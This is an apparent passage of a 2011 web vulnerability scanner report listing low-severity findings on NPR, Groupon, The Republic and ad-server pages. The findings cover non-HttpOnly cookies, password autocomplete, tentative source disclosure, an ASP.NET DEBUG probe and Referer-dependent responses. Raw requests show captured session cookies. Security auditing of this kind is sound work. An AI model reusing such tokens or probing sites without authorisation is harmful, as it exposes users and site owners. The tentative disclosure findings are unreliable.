11.123. http://www.tinbuadserv.com/v3/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /v3/serve.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v3/serve.php?m=horoscope&c=0&rd=793&l=en&u=http%3A//www.fox8live.com/entertainment/horoscopes/default.aspx&r=http%3A//www.fox8live.com/content/aboutus/default.aspx HTTP/1.1
Host: www.tinbuadserv.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/entertainment/horoscopes/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:40 GMT
Server: Apache
P3P: policyref="http://www.tinbuadserv.com/v3/privacy/p3p.xml", CP="NOI NID DSP COR DEV PSA PSD IVA IVD OTP OUR OTR IND DEM PRE OTC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tbcsrv3=kaBll62z16dkaZuQlaLVqtXYqtDOoZ%2BDqaZqmG2E2KaGqKZymKhVk9Wo0Oeq3Y9uq5ugbVK7hoSuq56hbVrE16epiG7VrW6ej3eZzdqUo4hu1a1tno%2BmrMLimFKhppylcobBi1qc4W1loFXP2KzW3FVz1KhmaohplKZan%2BBta5uQrZnWVZ3mcpmnVW%2BWoGNniG7VrWyej5Sqxs9Va9ltla1alp5nWpzhbWOgVc7UrIaopnKYqFVjmGGZq2qZj26rm6FtUtKi0JVz16drcoObbGaUa5Sjb4aopnKaqFWT1aDS1Kbd1pdanOFtYZlthNakyc6lm8nPoZ7Ln9WVc9enbHKD4aiSyqLP1KHSj26rm55tUohu1a1uno%2BXp87PnJ6IbtWtaZanVZ7Q5mucz6nHoZvT2lVz1Khpaoig0det0NJVc9SobGqIm9Hlp9fQoqjGkG6joGaclZnI4FVz1KhkaohjhK6rnqVtWsPPlpvbo8XiWp%2FgbWqbkIiDiG7VrWmXp1We0OCWldii1tSszdyhWpzhbWCgVYSuq56mbVrU05SiyZvE1KqGqKZykahVUqGmnKpyhtyjrMrdoaOIbtWtaJ6PVXPUqGpqiKDR16TF25panOFtYqBVx%2BFan%2BBta5uQnKPTVZ3mcpSnVVqc4W1ioFXS6Vqf1m1pnOFtZKBVxdSs149uq5uebVKIbtWtbZ6Ppq3D15dSoaacpm6ej5akxs%2Blk86U0OGd0OBhntDma5zPqcehm9PaYaDQ4KKjyaLS2Fqf4G1wm5CmpcicxuGt0Y9uq5ufZGqIZJKjaJSdY3Gap2ZSoaacq3KG3KOsyt2hkdJVneZylKdVWpzr; path=/; domain=.tinbuadserv.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript; charset=UTF-8
Content-Length: 584

tinbuAdServer.setArrayCookie("tbv3ads","browserlang|en","country|US","city|Dallas","state|TX","metro|623","zip|75207","area|214","lat|32.7825","lon|-96.8207","companyid|clearchannels","subdomain|","do
...[SNIP]...

12. Password field with autocomplete enabled
There are 7 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://shop.npr.org/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /index.php?p=login&ua=user_start_checkout HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/index.php?p=cart
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.4.10.1304955581

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19848

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</p>
<form action="https://shop.npr.org/index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=login" method="post" onsubmit="return CheckLoginForm(this)">
<input type="hidden" name="ua" value="user_login" />
...[SNIP]...
</label>
<input id="inputPassword" maxlength="36" type="password" name="password" value=""/>
</div>
...[SNIP]...

12.2. https://www.groupon.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<div class='page_content'>
<form action="/session" class="default" id="new_session" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label><input class="grid_5 input" id="session_password" name="session[password]" size="30" type="password" /><span class="caption">
...[SNIP]...

12.3. https://www.groupon.com/users/new

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<div class='grid_6'>
<form action="/users" class="default" id="new_user" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label><input class="input" id="user_password" name="user[password]" size="30" type="password" /></div>
...[SNIP]...
</label><input class="input" id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /></div>
...[SNIP]...

12.4. http://www.npr.org/templates/reg/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /templates/reg/ HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:39:46 GMT
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 09 May 2011 15:39:46 GMT
Age: 0
Content-Length: 44210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Registration<
...[SNIP]...
</script>

<form id="createaccount" action="https://www.npr.org/templates/reg/index-submit.php" method="post">
<input type="hidden" name="ref" value="" />
...[SNIP]...
</label>
<input type="password" name="public_user_password" id="pwd" value=""/> <span class="pwdtxt">
...[SNIP]...
</label>
<input type="password" name="public_user_password_confirm" id="rpwd" value=""/>
</p>
...[SNIP]...

12.5. http://www.npr.org/templates/reg/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/login.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /templates/reg/login.php HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:39:48 GMT
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 16829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Log in</title
...[SNIP]...
</div>
<form id="loginForm" action="https://www.npr.org/templates/reg/login-submit.php" method="post">
<input type="hidden" name="ref" value="" />
...[SNIP]...
</label>
<input class="textbox" type="password" name="public_user_password" id="password" value="" />
<a href="/templates/reg/forgot-password.php" class="forgot">
...[SNIP]...

12.6. http://www.therepublic.com/login/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /login/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FreakAuth=423b87089976e0474ec7fcf078c4204a; __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 24003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/process/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/>&nbsp<a href="./login/forgot/">
...[SNIP]...

12.7. http://www.therepublic.com/login/register/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/register/

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /login/register/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/reg_step1_sub/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/></p>
...[SNIP]...
</span><input type="password" name="login_password_rep" id="login_password_rep" size="30"/></p>
...[SNIP]...

13. Source code disclosure
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


13.1. http://assets1.grouponcdn.com/assets/application.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://assets1.grouponcdn.com
Path:   /assets/application.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /assets/application.js?OxIWiUVz HTTP/1.1
Host: assets1.grouponcdn.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Cache-Control: max-age=315360000
Cache-Control: public
Age: 44487
Date: Mon, 09 May 2011 15:35:51 GMT
Last-Modified: Mon, 09 May 2011 03:12:25 GMT
Expires: Thu, 06 May 2021 03:27:02 GMT
Connection: keep-alive
Content-Length: 128578

// Underscore.js 1.1.4
// (c) 2011 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed f
...[SNIP]...
+ id : id;
};

// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
evaluate : /<%([\s\S]+?)%>/g,
interpolate : /<%=([\s\S]+?)%>/g
};

// JavaScript micro-templating, similar to John Resig's implementation.
// Underscore templating handles arbitrary delimiters, preserves whitespace,
// and correctly escapes quotes withi
...[SNIP]...

13.2. http://assets1.grouponcdn.com/assets/subscriptions.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://assets1.grouponcdn.com
Path:   /assets/subscriptions.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /assets/subscriptions.js?kWgEDV5U HTTP/1.1
Host: assets1.grouponcdn.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Cache-Control: max-age=315360000
Cache-Control: public
Age: 44397
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Mon, 09 May 2011 03:12:25 GMT
Expires: Thu, 06 May 2021 03:27:07 GMT
Connection: keep-alive
Content-Length: 66178

// Underscore.js 1.1.4
// (c) 2011 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed f
...[SNIP]...
+ id : id;
};

// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
evaluate : /<%([\s\S]+?)%>/g,
interpolate : /<%=([\s\S]+?)%>/g
};

// JavaScript micro-templating, similar to John Resig's implementation.
// Underscore templating handles arbitrary delimiters, preserves whitespace,
// and correctly escapes quotes withi
...[SNIP]...

14. ASP.NET debugging enabled

Summary

Severity:   Information
Confidence:   Firm
Host:   http://usata1.gcion.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that the debug attribute in the <compilation> element has not been set to "true" within the Machine.config file as well.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Mon, 09 May 2011 15:36:56 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15. Referer-dependent response
There are 9 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



15.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttri
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
